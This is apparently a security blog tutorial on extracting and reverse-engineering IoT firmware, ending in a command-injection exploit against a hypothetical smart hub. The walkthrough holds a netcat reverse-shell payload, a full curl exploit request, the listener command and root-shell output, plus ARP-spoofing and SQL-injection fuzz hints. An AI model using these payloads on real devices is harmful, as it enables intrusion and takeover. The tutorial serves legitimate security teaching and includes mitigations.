Picoable

Posted on Nov 11 • Originally published at hacking.picoable.com

A Practical Guide to Extracting and Analyzing IoT Firmware

#firmware #reverseengineering #hacking #security

Introduction

The Internet of Things (IoT) has woven itself into the fabric of our daily lives, from smart home hubs and security cameras to industrial control systems. While these devices offer incredible convenience, they also represent a vast and often-vulnerable attack surface. Each device runs on firmware—the low-level software that controls its hardware. For a security researcher or bug bounty hunter, this firmware is a treasure map leading to potential vulnerabilities.

This guide provides a practical walkthrough of the firmware analysis process. Our goal is to demystify IoT hacking, transforming it from a perceived dark art into a systematic methodology. We'll cover extracting firmware, performing static and dynamic analysis, and identifying and exploiting a common vulnerability.

For our example, we'll target a hypothetical "AI-Powered Smart Hub." This device claims to personalize user experiences by learning from user behavior, implying complex on-device logic and cloud communication—a rich environment for security flaws.

Phase 1: Firmware Extraction

Before we can analyze anything, we need the firmware itself. This is often the first and most challenging hurdle. Here are the primary methods for getting your hands on the binary.

Physical Methods

If you have physical access to the device, you can often extract the firmware directly from the memory chip.

JTAG/SWD Interfaces: Many devices have exposed debugging ports like JTAG (Joint Test Action Group) or SWD (Serial Wire Debug) on their Printed Circuit Board (PCB). These ports provide low-level access to the CPU and memory.
- Tools: J-Link, OpenOCD, Bus Pirate.
- Process: Identify the JTAG/SWD pins (TDI, TDO, TCK, TMS, and sometimes TRST) on the PCB, connect your adapter, and use a debugger like GDB to halt the processor and dump the memory contents.
Direct Flash Memory Dumping: The firmware is typically stored in a NOR or NAND flash chip.
- Tools: Logic analyzer (e.g., Saleae), chip programmer (e.g., CH341A), hot-air rework station.
- Process: Solder wires to the chip's pins while it's on the board (in-system programming) or, for a cleaner read, desolder the chip entirely. Connect it to a programmer and read its contents directly. This bypasses software-level access controls on the device, although an image that is stored encrypted will still need to be decrypted.
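
Reads taken through clips or hand-soldered wires can be flaky, so a common precaution is to dump the chip twice and compare the results before trusting either file. The sketch below is one way to do that check; the function names are illustrative and not part of any tool mentioned above.

```python
import hashlib


def sha256_of(data: bytes) -> str:
    """Hex SHA-256 digest of a dump held in memory."""
    return hashlib.sha256(data).hexdigest()


def check_dumps(first: bytes, second: bytes) -> list:
    """Return a list of problems found; an empty list means the reads agree."""
    problems = []
    if not first:
        problems.append("first read is empty")
    if len(first) != len(second):
        problems.append(f"size mismatch: {len(first)} vs {len(second)} bytes")
    elif sha256_of(first) != sha256_of(second):
        problems.append("reads differ: check wiring, clip contact, or clock speed")
    # A dump made of one repeated byte (often 0xFF or 0x00) usually means
    # the programmer never actually talked to the chip.
    if first and len(set(first)) == 1:
        problems.append(f"first read is a single repeated byte 0x{first[0]:02x}")
    return problems
```

In practice you would pass in the contents of two separate reads, for example `check_dumps(open("read1.bin", "rb").read(), open("read2.bin", "rb").read())`, where both filenames are placeholders.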

Remote Methods

If you can't open the device, you can often capture the firmware as it travels over the network.

OTA (Over-the-Air) Updates: Most IoT devices update themselves by downloading firmware from a vendor's server.
- Tools: mitmproxy, Wireshark.
- Process: Position yourself as a man-in-the-middle (e.g., using ARP spoofing) and intercept the device's network traffic. When an update is initiated, you can capture the request and download the firmware file yourself. Plain HTTP is readable as-is; HTTPS is readable only if the device fails to validate certificates or can be made to trust your proxy's CA. Update files are often encrypted, but not always.
Exposed Services & Backdoors: Poorly configured devices might expose services that let you download the firmware.
- Tools: nmap, an FTP client, a web browser.
- Process: Scan the device for open ports. You might find an unprotected FTP server, an unauthenticated web endpoint, or even a TFTP server hosting the firmware image for recovery purposes.
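
A quick way to guess whether a captured update file is encrypted is to measure its byte entropy. The following is a minimal sketch; the 7.9 bits-per-byte threshold is an assumption chosen for illustration, and high entropy cannot distinguish encryption from compression on its own.

```python
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte: 0.0 for constant data, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    total = len(data)
    counts = Counter(data)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())


def looks_encrypted_or_compressed(data: bytes, threshold: float = 7.9) -> bool:
    """Heuristic only: the threshold is an illustrative assumption."""
    return shannon_entropy(data) >= threshold
```

If the whole file scores near 8.0 and a signature scan finds nothing recognizable, encryption is a reasonable suspicion. A file with readable headers and only some high-entropy regions is more likely a container with compressed sections.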

Phase 2: Static Analysis - Taking the Firmware Apart

Once you have the firmware file (e.g., firmware.bin), it's time to dissect it without running it.

Initial Triage with `binwalk`

binwalk is an indispensable tool for analyzing binary blobs. It scans for signatures of different file types, filesystems, and executable code.

```
# Scan the firmware for known signatures and recursively extract what is found
# (-e extracts, -M recurses into extracted files)
binwalk -eM firmware.bin
```

This command might reveal and extract a complete Linux filesystem, such as SquashFS or CramFS. Suddenly, you have the device's entire root directory, ready for inspection.
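
To make the idea of signature scanning concrete, here is a simplified sketch that searches a blob for a few well-known magic byte sequences. It is not how binwalk is implemented; real tools validate each candidate header to weed out false positives, and the small signature table here is only a sample.

```python
# A few well-known magic values; real scanners know hundreds.
SIGNATURES = {
    "SquashFS (little-endian)": b"hsqs",
    "CramFS (little-endian)": b"\x45\x3d\xcd\x28",
    "gzip stream": b"\x1f\x8b\x08",
    "U-Boot uImage header": b"\x27\x05\x19\x56",
}


def scan(blob: bytes) -> list:
    """Return sorted (offset, description) pairs for every magic value found."""
    hits = []
    for name, magic in SIGNATURES.items():
        offset = blob.find(magic)
        while offset != -1:
            hits.append((offset, name))
            offset = blob.find(magic, offset + 1)
    return sorted(hits)
```

Short magic values such as the three-byte gzip prefix will match by chance in large files, which is why a hit is a lead to verify and not a confirmed finding.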

Analyzing the Filesystem

With the filesystem extracted, you can start hunting for sensitive information:

Hardcoded Secrets: Look for API keys, passwords, and private certificates. A simple grep can be surprisingly effective.
```
# Search for anything that looks like an AWS access key
grep -r "AKIA" /path/to/extracted/filesystem/
```
Scripts and Configuration: Examine shell scripts (.sh) and Python scripts (.py) for logic flaws. A tool like bandit can automatically find dangerous patterns in Python code, such as the use of os.system or exec.
Binaries: The core application logic usually resides in compiled binaries in /usr/bin or /sbin. These are your primary targets for reverse engineering.
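
The grep approach can be extended into a small script that walks the extracted tree and checks several patterns at once. This is a rough sketch: the three regular expressions are illustrative assumptions, and they will produce both false positives and misses.

```python
import os
import re

# Illustrative patterns only; tune them for the target.
PATTERNS = {
    "AWS access key ID": re.compile(rb"AKIA[0-9A-Z]{16}"),
    "PEM private key": re.compile(rb"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
    "password assignment": re.compile(rb"(?i)passw(?:or)?d\s*[=:]\s*\S+"),
}


def find_secrets(root: str) -> list:
    """Return (path, label, matched_bytes) for every pattern hit under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            # Skip symlinks (they may point outside the extracted tree)
            # and anything that is not a regular file.
            if os.path.islink(path) or not os.path.isfile(path):
                continue
            try:
                with open(path, "rb") as fh:
                    data = fh.read()
            except OSError:
                continue
            for label, pattern in PATTERNS.items():
                for match in pattern.finditer(data):
                    findings.append((path, label, match.group(0)[:60]))
    return findings
```

Reading files as bytes means the same scan covers text configuration and compiled binaries, where hardcoded credentials also tend to show up.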

Reverse Engineering Binaries with Ghidra

Ghidra is a free, powerful software reverse engineering suite developed by the NSA.

Load the Binary: Import your target binary (e.g., the main /usr/sbin/smarthub_server) into a new Ghidra project. Ghidra will automatically analyze it, identifying functions and cross-references.
Find Interesting Functions: A great way to start is by searching for interesting strings in the "Defined Strings" window. Look for terms like "password," "secret," "API_KEY," http://, or error messages. Right-click a string and find its cross-references to see where in the code it's used.
Analyze Logic: Ghidra's decompiler will show you a C-like representation of the assembly code, making it much easier to understand.
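- Look for Weak Cryptography: Are they rolling their own encryption? Is there a custom integrity check? For example, you might find code that hashes parts of the firmware to verify its integrity. Expressed as Python-style pseudocode rather than raw decompiler output, such a routine could look similar to this:
```
  # Example of a firmware integrity check (illustrative pseudocode).
  # `reader` is assumed to be an already-parsed image whose `tensors`
  # entries expose their raw bytes; it is not defined in this snippet.
  import hashlib

  sha256 = hashlib.sha256()
  for tensor in reader.tensors:
      # ... skip some tensors ...
      sha256.update(tensor.data.data)
  # The final hash is then compared against a known value
```
Understanding this routine, including which parts are skipped, is key to patching the binary and recalculating the hash to bypass the check.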
- Identify Dangerous Functions: Pay close attention to calls to C functions known to be unsafe, like strcpy, sprintf, gets, and system. These are classic sources of buffer overflows and command injection vulnerabilities.
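
The string-hunting step can also be approximated outside Ghidra for a quick first pass. The sketch below pulls printable ASCII runs out of a binary and keeps those containing keywords like the ones suggested above; the keyword list and the minimum length of six characters are assumptions for illustration.

```python
import re

# Lower-case keywords to look for; extend as needed.
KEYWORDS = ("password", "secret", "api_key", "http://")


def extract_strings(blob: bytes, min_len: int = 6):
    """Yield (offset, text) for each printable-ASCII run of at least min_len bytes."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    for match in re.finditer(pattern, blob):
        yield match.start(), match.group(0).decode("ascii")


def interesting_strings(blob: bytes) -> list:
    """Keep only the strings that contain one of the keywords, case-insensitively."""
    return [
        (offset, text)
        for offset, text in extract_strings(blob)
        if any(keyword in text.lower() for keyword in KEYWORDS)
    ]
```

The offsets it returns can be used to jump to the same data in Ghidra and follow the cross-references from there.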

Phase 3: Dynamic Analysis - Poking the Live System

Static analysis tells you what the code can do. Dynamic analysis tells you what it actually does when it runs.

Environment Setup

Network Interception: The easiest way to analyze network traffic is to force the IoT device to route its traffic through your analysis machine. Set up your machine as a Wi-Fi hotspot and run mitmproxy or Wireshark.
Emulation: For ARM or MIPS binaries, you can often run them directly on your x86 machine using QEMU's user-space emulation (qemu-arm-static). This lets you run and debug the binary without needing the physical device.
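
Before emulating a binary you need to know which QEMU user-mode emulator matches it. The sketch below reads the ELF header to decide; it assumes the `qemu-*-static` naming used by common `qemu-user-static` packages and covers only 32-bit ARM, 32-bit MIPS (o32), and little-endian AArch64.

```python
import struct

# Keys are (e_machine, EI_CLASS, is_little_endian).
# e_machine: 8 = MIPS, 40 = ARM, 183 = AArch64. EI_CLASS: 1 = 32-bit, 2 = 64-bit.
QEMU_BY_TARGET = {
    (40, 1, True): "qemu-arm-static",
    (40, 1, False): "qemu-armeb-static",
    (8, 1, True): "qemu-mipsel-static",
    (8, 1, False): "qemu-mips-static",
    (183, 2, True): "qemu-aarch64-static",
}


def pick_qemu(elf_header: bytes) -> str:
    """Map the first 20 bytes of an ELF file to an emulator binary name."""
    if len(elf_header) < 20 or elf_header[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    ei_class = elf_header[4]
    little_endian = elf_header[5] == 1  # EI_DATA: 1 = LSB, 2 = MSB
    fmt = "<H" if little_endian else ">H"
    (machine,) = struct.unpack_from(fmt, elf_header, 18)  # e_machine field
    try:
        return QEMU_BY_TARGET[(machine, ei_class, little_endian)]
    except KeyError:
        raise ValueError(f"unhandled target: e_machine={machine}") from None
```

With the emulator chosen, a typical invocation points QEMU's `-L` option at the extracted root filesystem so the binary's dynamic loader and shared libraries resolve, for example `qemu-arm-static -L ./rootfs ./rootfs/usr/sbin/smarthub_server`, where `./rootfs` is a placeholder path.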

Analyzing Network Traffic

With mitmproxy running, you can see the HTTP requests the device makes, along with its HTTPS requests if the device accepts the proxy's certificate. This can reveal:

Undocumented cloud APIs.
Unencrypted data transmissions containing sensitive information like usernames or location data.
Real-time communication protocols like WebSockets or MQTT.

For example, you might discover the device uses a WebSocket for real-time status updates. The intercepted communication could look like this, revealing the protocol's structure:

CLIENT -> SERVER: {"event": "subscribe_to_research", "data": {"research_id": "user_activity_model"}}
SERVER -> CLIENT: {"event": "research_progress_user_activity_model", "data": {"progress": 10, "message": "Analyzing data..."}}

This gives you a blueprint to start fuzzing the endpoint. What happens if you send a non-existent research_id? Or a 10,000-character string? Or a SQL injection payload?
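
Those questions translate directly into a list of test messages. The sketch below only generates the JSON frames, reusing the event and field names from the captured exchange; sending them is left to whatever WebSocket client you prefer. The wrong-type and path-traversal cases are additions beyond the three ideas above.

```python
import json


def fuzz_messages():
    """Yield JSON text frames that mutate the observed research_id field."""
    candidates = [
        "does_not_exist",            # unknown identifier
        "A" * 10_000,                # oversized string
        "' OR '1'='1",               # SQL injection probe
        "../../etc/passwd",          # path traversal probe
        "",                          # empty value
        None,                        # wrong type: null
        12345,                       # wrong type: number
        {"nested": ["unexpected"]},  # wrong type: object
    ]
    for value in candidates:
        yield json.dumps({
            "event": "subscribe_to_research",
            "data": {"research_id": value},
        })
```

Send one frame at a time and record the response, or the lack of one, for each. A crash, a timeout, or an unusually verbose error message are all worth a closer look in the binary.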

Vulnerability Walkthrough: Unauthenticated Command Injection

Let's tie it all together with a concrete example.

Static Discovery: While analyzing the smarthub_server binary in Ghidra, we find a function that handles fetching content from a URL provided by the user (e.g., to set a custom dashboard background). The decompiled C code looks worryingly like this:
```
void fetch_background(char *user_url) {
  char command[256];
  // DANGER: user_url is not sanitized!
  sprintf(command, "curl -o /tmp/background.jpg '%s'", user_url);
  system(command);
}
```
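The code uses sprintf to construct a shell command with unsanitized user input and then executes it with system. This is a textbook command injection vulnerability. Because command is a fixed 256-byte buffer and sprintf does no bounds checking, an overlong URL would also overflow it.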
Dynamic Confirmation: We use our mitmproxy setup to find the API endpoint that triggers this function. We see a POST request to /api/set_dashboard_background with a JSON body: {"url": "http://example.com/image.jpg"}.
Exploitation: We can now craft a malicious payload. We'll use Burp Suite Repeater or a simple curl command to send a crafted URL that breaks out of the original command and executes our own. Our payload will start a reverse shell back to our machine.

The payload: ';/bin/busybox nc 192.168.1.100 4444 -e /bin/sh;'

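*   The first `'` closes the quoted string that the `curl` command opened, leaving `curl` with an empty URL.
*   The `;` ends the `curl` command so the shell moves on to the next one.
*   We then run `nc` (netcat) to connect back to our attacker machine (`192.168.1.100` on port `4444`) and execute a shell (`-e /bin/sh`). This assumes the device's BusyBox `nc` was built with `-e` support.
*   The final `;` ends our command, and the trailing `'` pairs with the closing quote left over from the original format string, so the leftover text becomes a separate command that simply fails.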
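
To see exactly what the shell receives, the substitution can be replayed offline. This sketch reuses the format string from the decompiled `fetch_background` function and the payload above; the split on `;` is a deliberately naive stand-in for shell parsing that works here only because no semicolon sits inside quotes.

```python
# Same format string as the decompiled fetch_background() function.
TEMPLATE = "curl -o /tmp/background.jpg '%s'"
PAYLOAD = "';/bin/busybox nc 192.168.1.100 4444 -e /bin/sh;'"


def build_command(user_url: str) -> str:
    """Mimic the sprintf() call: substitute the URL into the template."""
    return TEMPLATE % user_url


command = build_command(PAYLOAD)

# Naive split: valid for this payload, not a general shell parser.
parts = command.split(";")
for part in parts:
    print(repr(part))
```

The three printed parts are the `curl` call with an empty URL (`"curl -o /tmp/background.jpg ''"`), the injected `nc` command, and a leftover empty string (`"''"`) that the shell will fail to execute.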

Getting the Shell:
- On our attacker machine, we start a listener:
```
  nc -lvp 4444
```

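*   We send the malicious request to the device. The JSON body is wrapped in double quotes so that our local shell does not interpret the payload's single quotes and semicolons itself:

  ```bash
  curl -X POST http://192.168.1.50/api/set_dashboard_background \
  -H "Content-Type: application/json" \
  -d "{\"url\": \"';/bin/busybox nc 192.168.1.100 4444 -e /bin/sh;'\"}"
  ```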

*   Our listener catches the incoming connection, and we have a root shell on the device.

  ```
  listening on [any] 4444 ...
  connect to [192.168.1.100] from (UNKNOWN) [192.168.1.50] 48172
  # whoami
  root
  ```

  Game over.

Mitigation and Conclusion

Mitigation

The discovered vulnerability could be patched by adhering to secure coding principles:

Avoid system(): Never build shell commands with user-supplied data. Use library functions that don't invoke a shell, such as libcurl for making HTTP requests in C.
Input Validation: Strictly validate all user input. For a URL, ensure it uses the http or https scheme, parses to a real host, and doesn't contain shell metacharacters.
Principle of Least Privilege: The web server process should not run as root. A dedicated, unprivileged user would limit an attacker's capabilities even if they achieve code execution.
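
The input validation rule can be sketched in a few lines. The example is written in Python for brevity, not in the device's C, and the function name and character set are assumptions. It is a defense-in-depth check that complements removing the `system()` call and does not replace that fix.

```python
from urllib.parse import urlsplit

# Characters with special meaning to a POSIX shell, plus whitespace.
SHELL_METACHARACTERS = set("'\"`$;|&<>(){}\\ \t\r\n")


def is_safe_background_url(url: str) -> bool:
    """Accept only http(s) URLs that have a host and no shell metacharacters."""
    if not url or any(ch in SHELL_METACHARACTERS for ch in url):
        return False
    try:
        parts = urlsplit(url)
    except ValueError:  # e.g. a malformed IPv6 literal
        return False
    return parts.scheme in ("http", "https") and bool(parts.hostname)
```

The check is intentionally strict: rejecting `&` blocks some legitimate URLs with multi-parameter query strings, a trade-off that is usually acceptable for a background-image setting.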

Conclusion

Analyzing IoT firmware is a methodical process of peeling back layers. We started by physically or remotely acquiring the code, then used static analysis tools like binwalk and Ghidra to understand its structure and logic. Finally, we used dynamic analysis with mitmproxy to observe its real-world behavior, leading us to a critical vulnerability.

The world of IoT security is vast and growing. By mastering this cycle of extraction, static analysis, and dynamic analysis, you can effectively audit these devices, uncover significant vulnerabilities, and contribute to a more secure connected world. Hacking isn't magic; it's a systematic process of understanding a system so deeply that you can make it do things it was never designed to do.
